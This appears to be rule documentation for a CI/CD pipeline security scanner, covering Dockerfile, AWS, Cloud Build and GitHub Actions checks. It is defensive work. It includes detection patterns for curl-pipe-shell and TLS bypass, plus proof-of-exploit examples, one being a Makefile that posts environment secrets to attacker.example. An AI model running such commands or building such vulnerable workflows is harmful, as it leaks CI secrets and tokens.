Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (
.envshipped as a template,config.jsoncarrying only public flags). Suppress with a brief.pipelinecheckignorerationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: AU-2 Event Logging, IA-5 Authenticator Management.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone, ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD, even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag, the secret never lands in a layer or in the build history.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An
ARGwhose name matches the regex but is a non-secret config knob (a counter-example likeARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.
Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.
Source: EB-001 in the AWS provider.
EB-002: EventBridge rule has a wildcard target ARN HIGH
Evidences: AC-6 Least Privilege.
How this is detected. Wildcard target ARNs (e.g. arn:aws:lambda:us-east-1:123456789012:function:*) match every resource that fits the prefix. This is rarely intentional, usually a copy-paste from a more permissive resource ARN, and means the rule fans out to a much larger set of consumers than the author meant.
Recommendation. Replace wildcard target ARNs with specific resource ARNs. EventBridge targets with * route events to any resource that matches the prefix, frequently triggering unintended Lambda invocations or SNS sends.
Source: EB-002 in the AWS provider.
ECR-001: Image scanning on push not enabled HIGH
Evidences: RA-5 Vulnerability Monitoring and Scanning, SA-11 Developer Testing and Evaluation, SI-2 Flaw Remediation.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
Source: ECR-001 in the AWS provider.
ECR-002: Image tags are mutable HIGH
Evidences: CM-8 System Component Inventory, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance, SR-11 Component Authenticity.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently, the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection, SR-3 Supply Chain Controls and Processes.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-004: No lifecycle policy configured LOW
Evidences: CM-2 Baseline Configuration, CM-8 System Component Inventory.
How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available, anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.
Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.
Source: ECR-004 in the AWS provider.
ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest, SR-4 Provenance.
How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property, the same key-policy + audit shape as build outputs in S3 is warranted.
Recommendation. Set encryptionType=KMS with a customer-managed key ARN.
Source: ECR-005 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args, the resolved plaintext lands in build logs.
Source: GCB-003 in the Cloud Build provider.
GCB-005: Build timeout unset or excessive LOW 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.
Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-005 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: CM-2 Baseline Configuration, SR-4 Provenance.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SA-11 Developer Testing and Evaluation, SI-2 Flaw Remediation.
How this is detected. The detector matches tool names anywhere in the document, step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner, trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved, for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
Source: GCB-009 in the Cloud Build provider.
GCB-010: Remote script piped to shell interpreter HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository and invoke it from the checkout, removing the network fetch removes the attacker-controllable content entirely.
Source: GCB-010 in the Cloud Build provider.
GCB-011: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity.
How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.
Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-011 in the Cloud Build provider.
GCB-012: Credential-shaped literal in pipeline body CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML. AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE/CHANGEME are already filtered upstream so fixtures and docs don't false-match.
Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.
Source: GCB-012 in the Cloud Build provider.
GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile/registry integrity model, the build is technically reproducible but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.
Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.
Source: GCB-013 in the Cloud Build provider.
GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix
Evidences: AU-2 Event Logging, AU-9 Protection of Audit Information, AU-12 Audit Record Generation.
How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case- insensitive) trips this rule. GCS_ONLY / LEGACY pass. They persist logs, just to a different destination.
Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-014 in the Cloud Build provider.
GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.
Recommendation. Add an SBOM generation step, syft <image> -o cyclonedx-json, trivy image --format cyclonedx, and publish the resulting document alongside the image (typically via a cosign attestation so the SBOM travels with the artifact).
Source: GCB-015 in the Cloud Build provider.
GCB-016: Step dir field contains parent-directory escape (..) MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.
Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.
Source: GCB-016 in the Cloud Build provider.
GCB-017: Image-producing build does not request SLSA provenance MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance. Cloud Build's VERIFIED verify option is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.
Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.
Source: GCB-017 in the Cloud Build provider.
GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM
Evidences: CM-2 Baseline Configuration, IA-5 Authenticator Management.
How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.
Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.
Known false positives.
- Builds that use both forms during a migration trip the rule on the legacy block. That's intentional, finishing the migration is the fix.
Source: GCB-018 in the Cloud Build provider.
GCB-019: Shell entrypoint inlines a user substitution into args HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args: Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried, straight command injection through trigger configuration.
Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.
Source: GCB-019 in the Cloud Build provider.
GCB-020: serviceAccount points at the default Cloud Build service account HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.
Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.
Known false positives.
- Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.
Source: GCB-020 in the Cloud Build provider.
GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix
Evidences: SC-7 Boundary Protection.
How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and traffic interoperation with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.
Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief
.pipelinecheckignorerationale rather than disabling at the catalog level.
Source: GCB-021 in the Cloud Build provider.
GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.
Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That paper-overs typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and combined with dynamicSubstitutions: true (GCB-004) it widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief
.pipelinecheckignorerationale and anexpires:date so the waiver doesn't outlive the migration.
Source: GCB-022 in the Cloud Build provider.
GCB-023: Step references a user substitution not declared in substitutions: MEDIUM
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.
Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.
Source: GCB-023 in the Cloud Build provider.
GCB-024: Build pushes Docker images but top-level images: is empty LOW
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. When the build has at least one such step but the top-level images: field is missing or empty, fires. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected. Those are different builder images entirely.
Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.
Known false positives.
- Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in
images:) would trip this rule on the cache push. Suppress with--ignore-filewhen this matches.
Source: GCB-024 in the Cloud Build provider.
GCB-025: Build has no tags for audit / discoverability LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated. Cloud Build expands them at submission time.
Recommendation. Add a top-level tags: array to every cloudbuild.yaml, at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries so post-incident triage of which build emitted this becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds discoverable only by build-id; the id is a UUID with no signal.
Known false positives.
- Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with
--ignore-fileif that matches.
Source: GCB-025 in the Cloud Build provider.
GCB-026: Step waitFor: references an unknown step id MEDIUM
Evidences: CM-6 Configuration Settings.
How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists, typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent-skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.
Recommendation. Verify every ID listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build, Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.
Source: GCB-026 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, a third-party action compromise will propagate into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind
@v1/@v45shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA. - reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.
Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a
pull_request_targetworkflow with the PR head checked out runs in the base repo's privileged context. - Trail of Bits
Codecov-style supply chain via pwn requests(2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.
Proof of exploit.
Vulnerable: pull_request_target + checkout PR head =
attacker code runs with secrets + write-scope token.
name: build-pr
on:
pull_request_target:
branches: [main]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Attack: any external contributor opens a fork PR with a
tampered Makefile:
test:
# curl -X POST https://attacker.example/exfil \ # -d "$(env)" \
-d "$(git config --get-all http.https://github.com/.extraheader)"
CI runs the malicious target with the base repo's secrets
(every ${{ secrets.* }} the workflow has access to) and a
write-scope GITHUB_TOKEN. The PR doesn't even need to be
merged or reviewed — the privileged execution happens at
PR-open time.
Safe: split the workflow. The labeler runs with secrets
but never checks out PR head; the builder runs in
pull_request context with no secrets:
name: triage # privileged half on: { pull_request_target: { types: [opened, synchronize] } } jobs: label: runs-on: ubuntu-latest steps: - run: gh pr edit ${{ github.event.number }} --add-label triage env: GH_TOKEN: ${{ github.token }}
name: build # unprivileged half
on: { pull_request: {} }
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Source: GHA-002 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating
github.event.issue.title/pull_request.titledirectly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI. - Trail of Bits
pwn-requestresearch (2021): demonstrated the same primitive againstpull_request_targetworkflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route throughenv:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage on: pull_request_target: types: [opened, edited] jobs: greet: runs-on: ubuntu-latest steps: - run: | echo "New PR: ${{ github.event.pull_request.title }}"
